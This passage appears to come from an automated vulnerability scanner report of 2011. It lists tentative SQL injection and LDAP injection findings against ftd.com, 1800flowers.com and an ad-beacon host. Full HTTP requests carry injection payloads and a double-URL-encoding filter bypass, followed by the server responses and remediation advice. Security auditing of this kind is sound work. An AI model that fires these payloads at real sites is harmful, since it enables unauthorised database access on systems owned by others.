<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729992096</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

POST /empty/tealeaf.epl14521499'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123193
Date: Mon, 09 May 2011 01:08:35 GMT
X-Varnish: 1301398466
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe
...[SNIP]...

1.22. http://www.ftd.com/pics/counter.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /pics/counter.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15813113'%20or%201%3d1--%20 and 15813113'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pics15813113'%20or%201%3d1--%20/counter.gif?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:31 GMT
X-Varnish: 869426411
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869426411</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /pics15813113'%20or%201%3d2--%20/counter.gif?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123191
Date: Mon, 09 May 2011 01:06:32 GMT
X-Varnish: 869427079
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.23. http://www.ftd.com/pics/counter.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /pics/counter.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17406797'%20or%201%3d1--%20 and 17406797'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pics/counter.gif17406797'%20or%201%3d1--%20?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:33 GMT
X-Varnish: 729991704
Age: 20
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729991704</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /pics/counter.gif17406797'%20or%201%3d2--%20?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123191
Date: Mon, 09 May 2011 01:08:34 GMT
X-Varnish: 540338930
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.24. http://xcdn.xgraph.net/17572/ai/xg.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://xcdn.xgraph.net
Path:   /17572/ai/xg.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /17572%2527/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=home HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html;charset=utf-8
Server: Apache-Coyote/1.1
Content-Length: 1538
Expires: Mon, 09 May 2011 01:01:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:01:06 GMT
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<pre>java.lang.IllegalStateException
   org.apache.catalina.connector.ResponseFacade.sendRedirect(ResponseFacade.java:435)
   net.netedge.beacon.BeaconServer.deliverAudiencePlacementGif(BeaconServer.java:810)
   net.netedge.beaco
...[SNIP]...
<u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.18 logs.</u>
...[SNIP]...

Request 2

GET /17572%2527%2527/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=home HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response 2

HTTP/1.1 302 Moved Temporarily
Location: http://ib.adnxs.com/seg?add=108023
Server: Apache-Coyote/1.1
Content-Length: 0
Expires: Mon, 09 May 2011 01:01:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:01:06 GMT
Connection: close
Set-Cookie: _push4xgat=1304902866869; Domain=.xgraph.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _mpush=D82FE5FA7F5F8A72D371134E46D9833; Domain=.xgraph.net; Expires=Thu, 08-May-2014 01:01:06 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"


2. LDAP injection
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://blooms.1800flowers.com/cm [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 14e1fc02a2bff0a1)(sn=* and 14e1fc02a2bff0a1)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?ci=14e1fc02a2bff0a1)(sn=*&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 14e1fc02a2bff0a1)(sn=*_login=1304902869001684455414e1fc02a2bff0a1)(sn=*; path=/
Set-Cookie: 14e1fc02a2bff0a1)(sn=*_reset=1304902869;path=/
Expires: Sun, 08 May 2011 07:01:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=14e1fc02a2bff0a1)!(sn=*&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 14e1fc02a2bff0a1)!(sn=*_login=1304902869001684455414e1fc02a2bff0a1)!(sn=*; path=/
Set-Cookie: 14e1fc02a2bff0a1)!(sn=*_reset=1304902869;path=/
Expires: Sun, 08 May 2011 07:01:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.2. http://www.ftd.com/ [TLTSID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /

Issue detail

The TLTSID cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the TLTSID cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=*)(sn=*; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response 1

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:02:27 GMT
X-Varnish: 869413438 869395927
Age: 335
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136169


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<script type="text/javascript" language="javascript"> <!-- jQuery(document).ready( function(){ jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-analytics-0eb7e.js"); jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-trigger.js"); } ); //--> </script> <link rel="canonical" href="http://www.ftd.com" />    <script language="javascript" type="text/javascript">
       <!--
       try {
       setCookie('markcode', '351', '', '/', cookie_domain);
       } catch(e) {
           errAlert(e, 'setting markcode cookie in template');
       }
       //-->
       </script>
   
<script type="text/javascript">
<!--//
   var _traffic_dist = '{}';
           try {
               if ( markcode == '350'
                   || markcode == '514'
                   || markcode == '522'
                   || markcode == '528'
                   || markcode == '552'
                   || markcode == '558') {
                   var _sticky_markcodes = '{}';
                   stickyMarkcodeRedirect(_sticky_markcodes, _traffic_dist, 'http://www.ftd.com',1, '', '');
                   } else {
trafficDistribution(_traffic_dist, 'http://www.ftd.com', '', 1, '');
                   }
           } catch(e) {
               errAlert(e, 'trafficDistribution call');
           }
//-->
</script>


   
   <script language="javascript" type="text/javascript">
   <!--
   try {
       } catch(e) {
       errAlert(e, 'cobrand protected site check');
   }
   //-->
   </script>

<!-- start abandon popup code -->
   
<script language='javascript'>
<!--
   var showPopup = true;
   var Yaxis = 0;
   var blurred = false;
   var scart_unloadPopup_override = false;

   var isIE = (navigator.appName.indexOf("Microsoft") != -1);
   var isNav = (navigator.appName.indexOf("Netscape") != -1);
   var isFirefox = (navigator.userAgent.indexOf("Firefox") != -1);

   function unloadPopup(ev) {

/* If we are coming from the empty shopcart page. Thus, if our cart is empty.
           // Then don't show any popups.
           */

        if (scart_unloadPopup_override) {
            return 0;
           }

           var range = screen.height - document.body.offsetHeight;
           if (isIE) {
               ev = window.event;
           }

// kludge
if(!ev
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=*)!(sn=*; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response 2

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:02:28 GMT
X-Varnish: 729971806 729949891
Age: 416
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134961


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<script type="text/javascript" language="javascript">
<!--
jQuery(document).ready(
function(){
jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-analytics-0eb7e.js");
jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-trigger.js");
}
);
//-->
</script> <link rel="canonical" href="http://www.ftd.com" />    <script language="javascript" type="text/javascript">
       <!--
       try {
       setCookie('markcode', '351', '', '/', cookie_domain);
       } catch(e) {
           errAlert(e, 'setting markcode cookie in template');
       }
       //-->
       </script>
   
<script type="text/javascript">
<!--//
   var _traffic_dist = '{}';
           try {
               if ( markcode == '350'
                   || markcode == '514'
                   || markcode == '522'
                   || markcode == '528'
                   || markcode == '552'
                   || markcode == '558') {
                   var _sticky_markcodes = '{}';
                   stickyMarkcodeRedirect(_sticky_markcodes, _traffic_dist, 'http://www.ftd.com',1, '', '');
                   } else {
trafficDistribution(_traffic_dist, 'http://www.ftd.com', '', 1, '');
                   }
           } catch(e) {
               errAlert(e, 'trafficDistribution call');
           }
//-->
</script>


   
   <script language="javascript" type="text/javascript">
   <!--
   try {
       } catch(e) {
       errAlert(e, 'cobrand protected site check');
   }
   //-->
   </script>

<!-- start abandon popup code -->
   
<script language='javascript'>
<!--
   var showPopup = true;
   var Yaxis = 0;
   var blurred = false;
